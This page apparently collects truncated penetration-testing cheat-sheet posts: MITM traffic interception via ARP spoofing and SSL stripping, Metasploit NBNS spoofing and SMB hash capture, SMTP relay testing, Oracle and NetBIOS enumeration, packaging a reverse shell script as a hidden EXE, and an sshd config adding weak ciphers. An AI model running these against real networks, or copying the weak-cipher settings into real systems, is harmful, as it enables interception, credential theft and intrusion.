Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:35:35

1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3) sslstip.py -l 8080 -f lock.ico

4) Run arpspoof to redirect traffic to your machine (as...


Score: 0

By: ajayverma 2019-06-25 11:35:38

[+] SMTP Open Relay Commands

[-] ncat -C 86.54.23.178 25
[-] HELO mail.co.uk
[-] MAIL FROM: <user@mail.co.uk>
[-] RCPT TO: <test@email.com>
[-] DATA
Test Email...


Score: 0

By: ajayverma 2019-06-25 11:35:41

[+] Weak SSH Ciphers

sudo nano /etc/ssh/sshd_config

Add the following lines:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160

Restart SSH


[+] Unquoted Service Paths

Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add &...


Score: 0

By: ajayverma 2019-06-25 11:23:20

[+] NBNS Spoof / Capture

[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run

[>] SMB Capture

msf > use auxiliary/server/...


Score: 0

By: ajayverma 2019-06-25 11:23:24

1. NBTSCAN

root@bt:~# nbtscan -r 10.0.2.0/24
Doing NBT name scan for addresses from 10.0.2.0/24

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
10.0.2.0 Sendto failed: Permission denied
10.0.2.10 <unknown> ...


Score: 0

By: ajayverma 2019-06-25 11:20:34

[+] Reminders

LOG EVERYTHING!

Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop

Set IP address
ifconfig eth0 192.168.50.12/24

Set default gateway
route add default gw 192.168.50.9

Set DNS servers
echo "nameserver 192.168.100.2&q...


Score: 0

By: ajayverma 2019-06-25 11:20:37

python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py

[+] Generate the .spec file.
[+] Windows: (You want a single EXE file with your data in it, hence --onefile).

python pyinstaller.py --onefile your_main_file.py

[+] Rebuild your package.

python pyinstaller.py your_main...


Score: 0

By: ajayverma 2019-06-25 11:20:41

The Checklist

[+] Information Gathering

Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (eg, Mobile sites, access as...


Score: 0

By: ajayverma 2019-06-25 11:20:44

Tools within Kali:

oscanner
root@kali:~# oscanner -s 192.168.1.15 -P 1040

sidguess
root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt

tnscmd10g
root@kali:~# tnscmd10g version -h 192.168.1.20

Nmap
nmap -p 1521 -A 192.168.15.205

Nmap nse scripts
Metasploit auxiliaries...


Score: 0

By: ajayverma 2019-06-25 11:20:48

[+] Setting up an Ethernet bridge in Ubuntu/Kali Linux

# Install bridge-utils
sudo apt-get install bridge-utils

# Disable network-manager + firewall

# Configuration

ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 up
dhclient br0

sudo tcpdump -i br0...


Score: 0